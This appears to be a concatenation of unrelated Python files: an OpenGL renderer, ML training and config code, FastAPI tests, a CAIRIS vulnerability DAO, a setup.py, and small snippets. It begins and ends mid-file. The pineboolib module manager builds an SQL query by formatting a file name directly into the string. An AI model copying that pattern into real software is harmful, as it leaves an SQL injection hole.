(in_width / 2) - 1, in_pos.y / (in_height / 2) - 1, 0.0, 1.0); tex_coord = in_tex_coord; } """ BITMAP_FRAGMENT_SHADER = """ #version 330 in vec2 tex_coord; uniform float in_alpha; uniform sampler2D sampler; out vec4 out_frag_color; void main() { out_frag_color = texture(sampler, tex_coord); // set in_alpha to -1 to use the original alpha of the texture if (in_alpha != -1.0) { out_frag_color.a = in_alpha; } } """ class Renderer: """ A simple window for rendering that uses OpenGL to display bitmaps or text and returns key presses. Subclasses can override behavior to provide environment-specific drawing. """ def __init__(self, width: int, height: int) -> None: # do late imports of these to avoid any interference with other opengl libraries try: import glfw self._glfw = glfw except ImportError as e: raise Exception( f"failed to import glfw: '{e}', please make sure you have the newest version of glfw with `pip install --upgrade glfw`" ) import moderngl self._mgl = moderngl if not self._glfw.init(): raise Exception("failed to initialize glfw") self._glfw.window_hint(self._glfw.CLIENT_API, self._glfw.OPENGL_API) self._glfw.window_hint(self._glfw.CONTEXT_VERSION_MAJOR, 3) self._glfw.window_hint(self._glfw.CONTEXT_VERSION_MINOR, 3) self._glfw.window_hint( self._glfw.OPENGL_PROFILE, self._glfw.OPENGL_CORE_PROFILE ) self._glfw.window_hint(self._glfw.OPENGL_FORWARD_COMPAT, True) self._glfw.window_hint(self._glfw.RESIZABLE, False) self._glfw.window_hint(self._glfw.DOUBLEBUFFER, True) self._glfw.window_hint(self._glfw.DEPTH_BITS, 24) self.width = width self.height = height self.is_open = True self._should_close = False self._window = self._glfw.create_window( self.width, self.height, "Gym3 Viewer", None, None ) if not self._window: self._glfw.terminate() raise Exception("failed to create window") # self._glfw.get_key_name doesn't handle non-text keys self._key_to_name = { getattr(self._glfw, attr): attr.split("_", 1)[1] for attr in dir(self._glfw) if attr.startswith("KEY_") } self._keys_clicked = set() self._keys_pressed = set() self._glfw.set_key_callback(self._window, self._on_key_event) self._glfw.make_context_current(self._window) self._ctx = self._mgl.create_context() self._ctx.enable_only(self._mgl.BLEND) self._ctx.blend_func = self._mgl.SRC_ALPHA, self._mgl.ONE_MINUS_SRC_ALPHA self._bitmap_shader = self._ctx.program( vertex_shader=BITMAP_VERTEX_SHADER, fragment_shader=BITMAP_FRAGMENT_SHADER ) self._bitmap_shader["in_width"].value = self.width self._bitmap_shader["in_height"].value = self.height self._vbo = None self._vao = None def _on_key_event( self, window: Any, key: int, scancode: int, action: int, mode: int ) -> None: name = self._key_to_name.get(key) if action == self._glfw.PRESS: self._keys_pressed.add(name) self._keys_clicked.add(name) elif action == self._glfw.RELEASE: if name in self._keys_pressed: # hitting "fn" on a mac only seems to produce the RELEASE action self._keys_pressed.remove(name) def get_time(self) -> float: """ Get an accurate time using glfw.get_time() """ return self._glfw.get_time() def start(self) -> Tuple[Set, Set]: """ Start a new frame Returns: keys_clicked: keys the user has pressed since the last time finish() was called keys_pressed: keys the user currently has held down """ self._glfw.poll_events() self._ctx.screen.clear(0.0, 0.0, 0.0, 1.0) self._should_close = "ESCAPE" in self._keys_clicked keys_clicked = self._keys_clicked self._keys_clicked = set() return keys_clicked, self._keys_pressed def draw_bitmap( self, x: float, y: float, w: float, h: float, image: np.ndarray, antialias: bool = False, alpha: float = 1.0, ) -> None: """ Draw a bitmap to the screen at the location (x, y) with size (w, h) all units are in screen pixels Args: x: x position relative to left side of screen in pixels y: y position relative to bottom side of screen in pixels w: width of image in pixels h: height of image in pixels image: a numpy array of the image to draw antialias: if set to True, use antialiasing then drawing the bitmap alpha: how opaque to make the bitmap, 1.0 is fully opaque, 0.0 is transparent, -1.0 means use the alpha channel of the image """ tex = self._ctx.texture( size=(image.shape[1], image.shape[0]), components=image.shape[2], data=image.tobytes(), ) if not antialias: tex.filter = (self._mgl.NEAREST, self._mgl.NEAREST) tex.use(location=self._bitmap_shader["sampler"].value) self._bitmap_shader["in_alpha"].value = alpha # textures are expected to start with the last row of the image (the lower left corner) # but numpy format starts with the first row (top left corner) # as a result, we need to flip the t values in our texture coordinates vertices = np.array( [ # x, y, s, t [x, y, 0, 1], [x + w, y, 1, 1], [x, y + h, 0, 0], [x + w, y + h, 1, 0], ], dtype=np.float32, ) if self._vbo is None: self._vbo = self._ctx.buffer(vertices.tobytes()) else: self._vbo.write(vertices.tobytes()) if self._vao is None: self._vao = self._ctx.simple_vertex_array( self._bitmap_shader, self._vbo, "in_pos", "in_tex_coord" ) self._glfw.make_context_current(self._window) self._vao.render(self._mgl.TRIANGLE_STRIP) tex.release() def draw_text( self, x: float, y: float, text: str, size_px: int = 32, centered: bool = False, bg_alpha: float = 0.0, ) -> None: """ Draw a multi-line text string `text` to the screen at the indicated location (x, y) Args: x: x position relative to left side of screen in pixels y: y position relative to bottom side of screen in pixels text: text to draw, multiple lines are fine size_px: what size font to use in pixels centered: if set to True, x and y specify the center of the resulting text box rather than the bottom left corner bg_alpha: opacity of black background that is drawn automatically behind the text """ arr = _str_to_array(text) image = _convert_ascii_to_rgba(arr, size_px=size_px) w = image.shape[1] h = image.shape[0] if centered: x -= w / 2 y -= h / 2 self.draw_bitmap( x, y, w, h, image=np.zeros((1, 1, 3), dtype=np.uint8), alpha=bg_alpha ) self.draw_bitmap(x=x, y=y, w=w, h=h, image=image, alpha=-1.0) def finish(self) -> None: """ Complete the current frame and return keyboard keys that the user has input """ self._glfw.swap_buffers(self._window) if self._should_close or self._glfw.window_should_close(self._window): self._glfw.destroy_window(self._window) self.is_open = False def main(): r = Renderer(width=768, height=768) for i in range(1000): r.start() r.draw_text(i, r.height // 2, "meow!") r.finish() if __name__ == "__main__": main() 1-10 """ Convolutional Network Audio Classiifier default config. """ import copy import tensorflow as tf experiments = { "num_epochs": 15, "model_directory": "models/naive_lstm/", "dataset_name": "freesound_dataset", "data_iterator_name": "lstm_features", "model_name": "naive_lstm", "learning_rate": 0.0001, "freesound_dataset": { "labels_index_map_store_path": "/tmp/shabda/", "n_classes": 41, "train_csv_path": "data/freesound-audio-tagging/input/train.csv", "val_csv_path": None, # we dont have any validation csv file as such "test_csv_path": "./data/freesound-audio-tagging/input/sample_submission.csv", "train_audio_files_dir": "./data/freesound-audio-tagging/input/audio_train/", "val_audio_files_dir": "./data/freesound-audio-tagging/input/audio_train/", "test_audio_files_dir": "./data/freesound-audio-tagging/input/audio_test/" }, "data_iterator": { "use_mfcc": False, "n_mfcc": 64, "batch_size": 32, "sampling_rate": 44100, "audio_duration": 2, }, "cnn_naive": { "out_dim": 41 + 1, # one unknown "name": "cnn_naive", "learning_rate": 0.001 }, "model": { "out_dim": 41 + 1, # one unknown "name": "lstm_naive", "learning_rate": 0.001 } } Farhad-Shabani/TSETMC_Dashboard from .Essential_Functions import URL_Maker, Negative_Detector from .Scrape_Index import Scrape_Index from .Scrape_StockInfo import StockInfo from .Scrape_StockData_Realtime import Realtime_StockData from pineboolib.flcontrols import ProjectClass from pineboolib import decorators, qt3ui """ Gestor de módulos. Esta clase permite realizar las funciones básicas de manejo de ficheros de texto que forman parte de los módulos de aplicación, utilizando como soporte de almacenamiento la base de datos y el sistema de cachés de texto para optimizar las lecturas. Gestiona la carga y descarga de módulos. Mantiene cual es el módulo activo. El módulo activo se puede establecer en cualquier momento con FLManagerModules::setActiveIdModule(). Los módulos se engloban en áreas (FACTURACION, FINANCIERA, PRODUCCION, etc..) y cada módulo tiene varios ficheros de texto XML y scripts. Toda la estructura de módulos se almacena en las tablas flareas, flmodulos, flserial y flfiles, sirviendo esta clase como interfaz para el manejo de dicha estructura en el entorno de trabajo de AbanQ. @author InfoSiAL S.L. """ class FLManagerModules(ProjectClass): """ Mantiene el identificador del area a la que pertenece el módulo activo. """ activeIdArea_ = None """ Mantiene el identificador del módulo activo. """ activeIdModule_ = None """ Mantiene la clave sha correspondiente a la version de los módulos cargados localmente """ shaLocal_ = None """ Diccionario de claves de ficheros, para optimizar lecturas """ dictKeyFiles = {} """ Lista de todos los identificadores de módulos cargados, para optimizar lecturas """ listAllIdModules_ = {} """ Lista de todas los identificadores de areas cargadas, para optimizar lecturas """ listIdAreas_ = {} """ Diccionario con información de los módulos """ dictInfoMods = {} """ Diccionario de identificadores de modulo de ficheros, para optimizar lecturas """ dictModFiles = {} """ Base de datos a utilizar por el manejador """ db_ = None """ Uso interno. Informacion para la carga estatica desde el disco local """ staticBdInfo_ = None rootDir_ = None scriptsDir_ = None tablesDir_ = None formsDir_ = None reportsDir_ = None queriesDir_ = None transDir_ = None """ constructor """ def __init__(self, db = None): super(FLManagerModules ,self).__init__() if db: self.db_ = db """ destructor """ def __del__(self): self.finish() """ Acciones de inicialización del sistema de módulos. """ @decorators.NotImplementedWarn def init(self): pass """ Acciones de finalización del sistema de módulos. """ @decorators.NotImplementedWarn def finish(self): pass """ Obtiene el contenido de un fichero almacenado la base de datos. Este método busca el contenido del fichero solicitado en la base de datos, exactamente en la tabla flfiles, si no lo encuentra intenta obtenerlo del sistema de ficheros. @param n Nombre del fichero. @return QString con el contenido del fichero o vacía en caso de error. """ @decorators.NotImplementedWarn def content(self, n): return None """ Obtiene el contenido de un fichero de script, procesándolo para cambiar las conexiones que contenga, de forma que al acabar la ejecución de la función conectada se reanude el guión de pruebas. Tambien realiza procesos de formateo del código para optimizarlo. @param n Nombre del fichero. @return QString con el contenido del fichero o vacía en caso de error. """ @decorators.NotImplementedWarn def byteCodeToStr(self, n): return None @decorators.NotImplementedWarn def contentCode(self, n): return None """ Obtiene el contenido de un fichero almacenado en el sistema de ficheros. @param pN Ruta y nombre del fichero en el sistema de ficheros @return QString con el contenido del fichero o vacía en caso de error. """ @decorators.NotImplementedWarn def contentFS(self, pN): return None """ Obtiene el contenido de un fichero, utilizando la caché de memoria y disco. Este método primero busca el contenido del fichero solicitado en la caché interna, si no está lo obtiene con el método FLManagerModules::content(). @param n Nombre del fichero. @return QString con el contenido del fichero o vacía en caso de error. """ @decorators.NotImplementedWarn def contentCached(self, n, shaKey = None): return None """ Almacena el contenido de un fichero en un módulo dado. @param n Nombre del fichero. @param idM Identificador del módulo al que se asociará el fichero @param content Contenido del fichero. """ @decorators.NotImplementedWarn def setContent(self, n, idM, content): pass """ Crea un formulario a partir de su fichero de descripción. Utiliza el método FLManagerModules::contentCached() para obtener el texto XML que describe el formulario. @param n Nombre del fichero que contiene la descricpción del formulario. @return QWidget correspondiente al formulario construido. """ def createUI(self, n, connector = None, parent = None, name = None): if not ".ui" in n: n = n +".ui" form_path = parent.prj.path(n) qt3ui.loadUi(form_path, parent.widget) """ Crea el formulario maestro de una acción a partir de su fichero de descripción. Utiliza el método FLManagerModules::createUI() para obtener el formulario construido. @param a Objeto FLAction. @return QWidget correspondiente al formulario construido. """ @decorators.NotImplementedWarn def createForm(self, a, connector = None, parent = None, name = None): return None """ Esta función es igual a la anterior, sólo se diferencia en que carga la descripción de interfaz del formulario de edición de registros. """ @decorators.NotImplementedWarn def createFormRecord( self, a, connector = None, parent = None, name = None): return None """ Para establecer el módulo activo. Automáticamente también establece cual es el área correspondiente al módulo, ya que un módulo sólo puede pertenecer a una sola área. @param id Identificador del módulo """ @decorators.NotImplementedWarn def setActiveIdModule(self, _id): pass """ Para obtener el area del módulo activo. @return Identificador del area """ def activeIdArea(self): return self.activeIdArea_ """ Para obtener el módulo activo. @return Identificador del módulo """ def activeIdModule(self): return self.activeIdModule_ """ Obtiene la lista de identificadores de area cargadas en el sistema. @return Lista de identificadores de areas """ @decorators.NotImplementedWarn def listIdAreas(self): return None """ Obtiene la lista de identificadores de módulos cargados en el sistema de una area dada. @param idA Identificador del área de la que se quiere obtener la lista módulos @return Lista de identificadores de módulos """ @decorators.NotImplementedWarn def listIdModules(self, idA): return None """ Obtiene la lista de identificadores de todos los módulos cargados en el sistema. @return Lista de identificadores de módulos """ @decorators.NotImplementedWarn def listAllIdModules(self): pass """ Obtiene la descripción de un área a partir de su identificador. @param idA Identificador del área. @return Texto de descripción del área, si lo encuentra o idA si no lo encuentra. """ @decorators.NotImplementedWarn def idAreaToDescription(self, idA): return None """ Obtiene la descripción de un módulo a partir de su identificador. @param idM Identificador del módulo. @return Texto de descripción del módulo, si lo encuentra o idM si no lo encuentra. """ @decorators.NotImplementedWarn def idModuleToDescription(self, idM): return None """ Para obtener el icono asociado a un módulo. @param idM Identificador del módulo del que obtener el icono @return QPixmap con el icono """ @decorators.NotImplementedWarn def iconModule(self, idM): return None """ Para obtener la versión de un módulo. @param idM Identificador del módulo del que se quiere saber su versión @return Cadena con la versión """ @decorators.NotImplementedWarn def versionModule(self, idM): return None """ Para obtener la clave sha local. @return Clave sha de la versión de los módulos cargados localmente """ @decorators.NotImplementedWarn def shaLocal(self): return None """ Para obtener la clave sha global. @return Clave sha de la versión de los módulos cargados globalmente """ @decorators.NotImplementedWarn def shaGlobal(self): return None """ Establece el valor de la clave sha local con el del global. """ @decorators.NotImplementedWarn def setShaLocalFromGlobal(self): pass """ Obtiene la clave sha asociada a un fichero almacenado. @param n Nombre del fichero @return Clave sh asociada al ficheros """ @decorators.NotImplementedWarn def shaOfFile(self, n): return None """ Carga en el diccionario de claves las claves sha1 de los ficheros """ @decorators.NotImplementedWarn def loadKeyFiles(self): pass """ Carga la lista de todos los identificadores de módulos """ @decorators.NotImplementedWarn def loadAllIdModules(self): pass """ Carga la lista de todos los identificadores de areas """ @decorators.NotImplementedWarn def loadIdAreas(self): pass """ Comprueba las firmas para un modulo dado """ @decorators.NotImplementedWarn def checkSignatures(self): pass """ Para obtener el identificador del módulo al que pertenece un fichero dado. @param n Nombre del fichero incluida la extensión @return Identificador del módulo al que pertenece el fichero """ def idModuleOfFile(self, n): query = "SELECT idmodulo FROM flfiles WHERE nombre='%s'" % n cursor = self.db_.cursor() try: cursor.execute(query) except: return None for idmodulo in cursor: return idmodulo[0] """ Guarda el estado del sistema de módulos """ @decorators.NotImplementedWarn def writeState(self): pass """ Lee el estado del sistema de módulos """ def readState(self): pass """ Uso interno. Obtiene el contenido de un fichero mediante la carga estatica desde el disco local @param n Nombre del fichero. @return QString con el contenido del fichero o vacía en caso de error. """ @decorators.NotImplementedWarn def contentStatic(self, n): return None """ Uso interno. Muestra cuadro de dialogo para configurar la carga estatica desde el disco local """ @decorators.NotImplementedWarn def staticLoaderSetup(self): pass 1-10 import os, argparse, sys, shutil, warnings, glob from datetime import datetime import matplotlib.pyplot as plt from math import log2, log10 import pandas as pd import numpy as np from collections import OrderedDict from torchvision import transforms, utils import torchvision import torch.nn.functional as F import torch.nn as nn import torch.optim as optim import torch from torch.utils.data import DataLoader from torch.autograd import Variable import torch.optim.lr_scheduler as lr_scheduler from skimage import exposure, color, io, img_as_float, img_as_ubyte from skimage.util import view_as_windows, pad, montage from PIL import Image, ImageFilter import imagej import data_loader as data import models import pytorch_fid.fid_score as fid_score def paired_dataloader(args, csv='train'): transformed_dataset = data.Paired_Dataset(csv_file=data.paired_csv_path(csv, dataset=args.dataset), img_size=args.patch_size, transform=data.Compose([data.ToTensor()]) ) dataloader = DataLoader(transformed_dataset, batch_size=args.batch_size, shuffle=True, num_workers=args.num_workers) return dataloader def train(args, epoch, run, dataloader, generator, discriminator, optimizer_G, optimizer_D, criterionL, criterionMSE, Tensor=None, device='cuda:0', patch=None): l = args.percep_weight if args.gan == 0: gan = False else: gan = True epoch_loss = 0 gan_loss = 0 total_loss = 0 dis_loss = 0 generator.train() for iteration, batch in enumerate(dataloader): real_mid = Variable(batch['input'].type(Tensor).to(device), requires_grad=False) real_high = Variable(batch['output'].type(Tensor).to(device), requires_grad=False) # Adversarial ground truths valid = Variable(Tensor(np.ones((real_mid.size(0), *patch))).to(device), requires_grad=False) fake = Variable(Tensor(np.zeros((real_mid.size(0), *patch))).to(device), requires_grad=False) #--------------- # Train Generator #--------------- optimizer_G.zero_grad() # GAN loss fake_high = generator(real_mid) if gan: pred_fake = discriminator(fake_high, real_mid) loss_GAN = criterionMSE(pred_fake, valid) # Identity lossL1 = criterionL(fake_high, real_high) loss_pixel = lossL1 # Total loss if gan: loss_G = l * loss_GAN + (1-l) * loss_pixel loss_G.backward() total_loss = total_loss + loss_G.item() gan_loss = gan_loss + loss_GAN.item() else: loss_pixel.backward() optimizer_G.step() #--------------- # Train Discriminator #--------------- if gan and iteration % args.num_critic == 0: optimizer_D.zero_grad() # Real loss pred_real = discriminator(real_high, real_mid) loss_real = criterionMSE(pred_real, valid) # Fake loss pred_fake = discriminator(fake_high.detach(), real_mid) loss_fake = criterionMSE(pred_fake, fake) # Total loss loss_D = 0.5 * (loss_real + loss_fake) loss_D.backward() optimizer_D.step() dis_loss = dis_loss + loss_D.item() epoch_loss = epoch_loss + loss_pixel.item() if gan: sys.stdout.write('\r[%d/%d][%d/%d] Discriminator_Loss: %.4f Generator_Loss (Identity/Advers/Total): %.4f/%.4f/%.4f' % (epoch, args.num_epochs, iteration, len(dataloader), loss_D.item(), loss_pixel.item(), loss_GAN.item(), loss_G.item())) else: sys.stdout.write('\r[%d/%d][%d/%d] Generator_L1_Loss: %.4f' % (epoch, args.num_epochs, iteration, len(dataloader), loss_pixel.item())) print("\n ===> Epoch {} Complete: Avg. Loss: {:.4f}".format(epoch, epoch_loss / len(dataloader))) g_path = os.path.join('weights', run, 'generator.pth') d_path = os.path.join('weights', run, 'discriminator.pth') os.makedirs(os.path.join('weights', run), exist_ok=True) torch.save(generator.state_dict(), g_path) if gan: os.makedirs(os.path.join('weights', run), exist_ok=True) torch.save(discriminator.state_dict(), d_path) def compute_p_snr(path_input, path_ref): MSE = nn.MSELoss() imgs_input = glob.glob(os.path.join(path_input, '*.tiff')) imgs_ref = glob.glob(os.path.join(path_ref, '*.tiff')) ave_psnr = 0 for i in range(len(imgs_input)): img_input = torch.from_numpy(img_as_float(io.imread(imgs_input[i]).transpose(2, 1, 0))) img_ref = torch.from_numpy(img_as_float(io.imread(imgs_ref[i]).transpose(2, 1, 0))) img_input = img_input[None, :] img_ref = img_ref[None, :] mse = MSE(img_input, img_ref) psnr = 10 * log10(1 / mse.item()) ave_psnr += psnr ave_psnr = ave_psnr / len(imgs_input) return ave_psnr def print_output(generator, dataloader_valid, device='cuda:0'): os.makedirs('output/print', exist_ok=True) os.makedirs('output/print/lr', exist_ok=True) os.makedirs('output/print/hr', exist_ok=True) os.makedirs('output/print/sr', exist_ok=True) with torch.no_grad(): generator.eval() print("=> Printing sampled patches") for k, batch in enumerate(dataloader_valid): input, target = batch['input'].to(device), batch['output'].to(device) imgs_input =input.float().to(device) prediction = generator(imgs_input) target = target.float() for i in range(target.shape[0]): utils.save_image(imgs_input[i], 'output/print/lr/{}_{}.tiff'.format(k, i)) utils.save_image(target[i], 'output/print/hr/{}_{}.tiff'.format(k, i)) utils.save_image(prediction[i], 'output/print/sr/{}_{}.tiff'.format(k, i)) sys.stdout.write("\r ==> Batch {}/{}".format(k+1, len(dataloader_valid))) print("\n Computing FID score") fid = fid_score.calculate_fid_given_paths(('output/print/sr', 'output/print/hr'), 8, 'cuda:0', 2048) print("\n Computing PSNR") psnr = compute_p_snr('output/print/sr', 'output/print/hr') print("FID score: {}, PSNR: {}".format(fid, psnr)) return fid, psnr def main(): parser = argparse.ArgumentParser(description='Train WSISR on compressed TMA dataset') parser.add_argument('--batch-size', default=32, type=int, help='Batch size') parser.add_argument('--patch-size', default=256, type=int, help='Patch size') parser.add_argument('--num-workers', default=4, type=int, help='Number of workers') parser.add_argument('--num-epochs', default=900, type=int, help='Number of epochs, more epochs are desired for GAN training') parser.add_argument('--g-lr', default=0.0001, type=float, help='Learning rate of the generator') parser.add_argument('--d-lr', default=0.00001, type=float, help='Learning rate of the descriminator') parser.add_argument('--percep-weight', default=0.01, type=float, help='GAN loss weight') parser.add_argument('--run-from', default=None, type=str, help='Load weights from a previous run, use folder name in [weights] folder') parser.add_argument('--gan', default=1, type=int, help='Use GAN') parser.add_argument('--num-critic', default=1, type=int, help='Iteration interval for training the descriminator') parser.add_argument('--test-interval', default=50, type=int, help='Epoch interval for FID score testing') parser.add_argument('--print-interval', default=10, type=int, help='Epoch interval for output printing') parser.add_argument('--dataset', default='TMA', type=str, help='Dataset folder name') parser.add_argument('--in-folder', default='low', type=str, help='Low NA image folder name') parser.add_argument('--out-folder', default='high', type=str, help='High NA image folder name') parser.add_argument('--extension', default='jpg', type=str, help='Training image extension') args = parser.parse_args() warnings.filterwarnings('ignore') device = torch.device('cuda:0') tensor = torch.cuda.FloatTensor data.generate_paired_csv(dataset=args.dataset, in_folder=args.in_folder, out_folder=args.out_folder, ext=args.extension) valid_dataset = paired_dataloader(args, 'valid') train_dataset = paired_dataloader(args, 'train') test_dataset = paired_dataloader(args, 'test') generator = models.Generator() generator.to(device); discriminator = models.Discriminator() discriminator.to(device); criterionL = nn.L1Loss().cuda() criterionMSE = nn.MSELoss().cuda() optimizer_G = torch.optim.Adam(generator.parameters(), lr=args.g_lr) optimizer_D = torch.optim.Adam(discriminator.parameters(), lr=args.d_lr) patch = (1, args.patch_size // 2 ** 4, args.patch_size // 2 ** 4) if args.run_from is not None: generator.load_state_dict(torch.load(os.path.join('weights', args.run_from, 'generator.pth'))) try: discriminator.load_state_dict(torch.load(os.path.join('weights', args.run_from, 'discriminator.pth'))) except: print('Discriminator weights not found!') pass optimizer_G = torch.optim.Adam(generator.parameters(), lr=args.g_lr) optimizer_D = torch.optim.Adam(discriminator.parameters(), lr=args.d_lr) scheduler_G = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer_G, args.num_epochs, args.g_lr*0.05) scheduler_D = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer_D, args.num_epochs, args.d_lr*0.05) run = datetime.now().strftime("%Y-%m-%d--%H-%M-%S") for epoch in range(0, args.num_epochs): train(args, epoch, run, train_dataset, generator, discriminator, optimizer_G, optimizer_D, criterionL, criterionMSE, tensor, device, patch) scheduler_G.step() scheduler_D.step() if epoch % args.print_interval == 0: print_output(generator, valid_dataset, device) print_output(generator, test_dataset, device) if __name__ == '__main__': main() from fastapi.testclient import TestClient from src.routes.car import app from src import DBConnection client = TestClient(app) def test_car_get_all(): response = client.get("/") assert response.status_code == 200 def test_car_add_new(): db = DBConnection() db.cursor.execute('DELETE from vehicle WHERE model = "TestModelOnly"') db.conn.commit() car = {"manufacturer": "BMW", "model": "TestModelOnly", "year": 2100, "price": 1242} response = client.post("/", json=car) assert response.status_code == 201 db.cursor.execute( 'SELECT manufacturer_id, model, year, price FROM vehicle WHERE model="TestModelOnly"' ) for i in db.cursor.fetchall(): assert i == { "manufacturer_id": 5, "model": "TestModelOnly", "year": 2100, "price": 1242, } db.cursor.execute('DELETE from vehicle WHERE model = "TestModelOnly"') db.conn.commit() # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. from cairis.core.ARM import * from cairis.daemon.CairisHTTPError import ARMHTTPError, ObjectNotFoundHTTPError, MalformedJSONHTTPError, MissingParameterHTTPError, \ OverwriteNotAllowedHTTPError from cairis.core.ValueType import ValueType from cairis.core.ValueTypeParameters import ValueTypeParameters from cairis.core.Vulnerability import Vulnerability from cairis.core.VulnerabilityEnvironmentProperties import VulnerabilityEnvironmentProperties from cairis.core.VulnerabilityParameters import VulnerabilityParameters from cairis.data.CairisDAO import CairisDAO from cairis.tools.JsonConverter import json_serialize, json_deserialize from cairis.tools.ModelDefinitions import VulnerabilityModel, VulnerabilityEnvironmentPropertiesModel from cairis.tools.SessionValidator import check_required_keys __author__ = ', ' class VulnerabilityDAO(CairisDAO): def __init__(self, session_id): CairisDAO.__init__(self, session_id, 'vulnerability') def get_objects(self, constraint_id=-1): try: vulnerabilities = self.db_proxy.getVulnerabilities(constraint_id) except DatabaseProxyException as ex: self.close() raise ARMHTTPError(ex) vulKeys = sorted(vulnerabilities.keys()) vulList = [] for key in vulKeys: vulList.append(self.simplify(vulnerabilities[key])) return vulList def get_object_by_name(self, name, simplify=True): found_vulnerability = None try: vulnerabilities = self.db_proxy.getVulnerabilities() except DatabaseProxyException as ex: self.close() raise ARMHTTPError(ex) if vulnerabilities is not None: found_vulnerability = vulnerabilities.get(name) if found_vulnerability is None: self.close() raise ObjectNotFoundHTTPError('The provided vulnerability name') if simplify: found_vulnerability = self.simplify(found_vulnerability) return found_vulnerability def add_object(self, vulnerability): vuln_params = VulnerabilityParameters( vulName=vulnerability.theName, vulDesc=vulnerability.theDescription, vulType=vulnerability.theType, tags=vulnerability.theTags, cProperties=vulnerability.theEnvironmentProperties ) try: if not self.check_existing_vulnerability(vulnerability.theName): new_id = self.db_proxy.addVulnerability(vuln_params) return new_id else: self.close() raise OverwriteNotAllowedHTTPError(obj_name=vulnerability.theName) except DatabaseProxyException as ex: self.close() raise ARMHTTPError(ex) except ARMException as ex: self.close() raise ARMHTTPError(ex) def update_object(self, vulnerability, name): vuln_params = VulnerabilityParameters( vulName=vulnerability.theName, vulDesc=vulnerability.theDescription, vulType=vulnerability.theType, tags=vulnerability.theTags, cProperties=vulnerability.theEnvironmentProperties ) try: vulId = self.db_proxy.getDimensionId(name,'vulnerability') vuln_params.setId(vulId) self.db_proxy.updateVulnerability(vuln_params) except DatabaseProxyException as ex: self.close() raise ARMHTTPError(ex) except ARMException as ex: self.close() raise ARMHTTPError(ex) def delete_object(self, name): try: vulId = self.db_proxy.getDimensionId(name,'vulnerability') self.db_proxy.deleteVulnerability(vulId) except DatabaseProxyException as ex: self.close() raise ARMHTTPError(ex) except ARMException as ex: self.close() raise ARMHTTPError(ex) def check_existing_vulnerability(self, name): try: self.db_proxy.nameCheck(name, 'vulnerability') return False except ARMException as ex: if str(ex.value).find('already exists') > -1: return True self.close() raise ARMHTTPError(ex) def from_json(self, request): json = request.get_json(silent=True) if json is False or json is None: self.close() raise MalformedJSONHTTPError(data=request.get_data()) json_dict = json['object'] check_required_keys(json_dict, VulnerabilityModel.required) json_dict['__python_obj__'] = Vulnerability.__module__+'.'+Vulnerability.__name__ for idx in range(0, len(json_dict['theEnvironmentProperties'])): property = json_dict['theEnvironmentProperties'][idx] check_required_keys(property, VulnerabilityEnvironmentPropertiesModel.required) property['__python_obj__'] = VulnerabilityEnvironmentProperties.__module__+'.'+VulnerabilityEnvironmentProperties.__name__ json_dict['theEnvironmentProperties'][idx] = property vulnerability = json_serialize(json_dict) vulnerability = json_deserialize(vulnerability) if not isinstance(vulnerability, Vulnerability): self.close() raise MalformedJSONHTTPError(data=request.get_data()) else: return vulnerability def simplify(self, obj): assert isinstance(obj, Vulnerability) del obj.theVulnerabilityId del obj.theEnvironmentDictionary del obj.severityLookup return obj exchangemanager/settings/production.py import dj_database_url from .base import * DEBUG = False INSTALLED_APPS += ('mod_wsgi.server',) DATABASES['default'] = dj_database_url.config(conn_max_age=500) STATIC_ROOT = os.getenv('DJANGO_STATIC_ROOT') """ Copyright 2016-2017 Amazon.com, Inc. or its affiliates. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with the License. A copy of the License is located at http://aws.amazon.com/apache2.0/ or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from setuptools import setup, find_packages setup( name="cfn_flip", version="1.2.2", description="Convert AWS CloudFormation templates between JSON and YAML formats", long_description=open("README.md").read(), long_description_content_type="text/markdown", url="https://github.com/awslabs/aws-cfn-template-flip", author="", author_email="", license="Apache2", packages=find_packages(exclude=["tests"]), install_requires=[ "Click", "PyYAML>=4.1", "six", ], tests_require=[ 'pytest>=4.3.0', 'pytest-cov', 'pytest-runner' ], zip_safe=False, entry_points={ "console_scripts": ["cfn-flip=cfn_flip.main:main"], }, ) 1-10 """Example python 3.x web project with everything from unit testing to continuous deployment.""" __title__ = "minimalpy" __version__ = VERSION = "0.3.0" __author__ = "blankdots" __license__ = "Apache License 2.0" QGB/zmirror # coding=utf-8 from .test_default_mirror import TestDefaultMirror from .test_httpbin import TestHttpbin from .test_verification import TestVerification, TestVerificationSingleAnswer from .test_cache_system import TestCacheSystem from .test_cdn import TestCDN from .test_redirection import TestRedirection from .test_functions import TestFunctions from .test_custom_response_text_rewrite import TestCustomResponseRewriter from .test_developer_functions import TestDeveloperFunctions from .test_non_standard_port import TestNonStandardPort from .test_regex import TestRegex from .test_connection_pool import TestConnectionPool from .test_custom_content_injection import TestContentInjection # Currently this is only used to count the number of question pairs with at least one empty sentence # May think of more useful analysis on the processed tuples at a later point. import numpy as np import cPickle with open("data/data_tuples_glovem.p", "rb") as f: data_tuples = cPickle.load(f) cnt = 0 for idx, tx in enumerate(data_tuples): s1 = tx[0] s2 = tx[1] if len(s1.split()) ==0 : #print idx, "s1", s1 cnt += 1 if len(s2.split()) == 0: #print idx, "s2", s2 cnt += 1 print "Empty sentences num ", cnt Codechef/atm.py w, b = input().split() w = int(w) b = float(b) if (w % 5 == 0 and b>(w+.5)): b = b - w - 0.5 print('%.2f' % b) else: print('%.2f' % b)import pytest as pt import aimsprop as ai def test_compute_population(bundle): # 1. Compute the populations for states. # Test if the computed population at time 25 is correct. pop = ai.compute_population(bundle) assert pop[1][24] == pt.approx(0.441434205, rel=1e-7) class Graph: """ Class to create graph instances. """ def __init__(self): """ Instantiates each graph instance with a table dictionary. """ self._table = {} def add_vertex(self, data): """ Method to add a vertex (node) to a graph with the *data* attribute equal to the argument supplied. """ self._table[data] = {'visited': False, 'neighbors': {}} def add_edge(self, 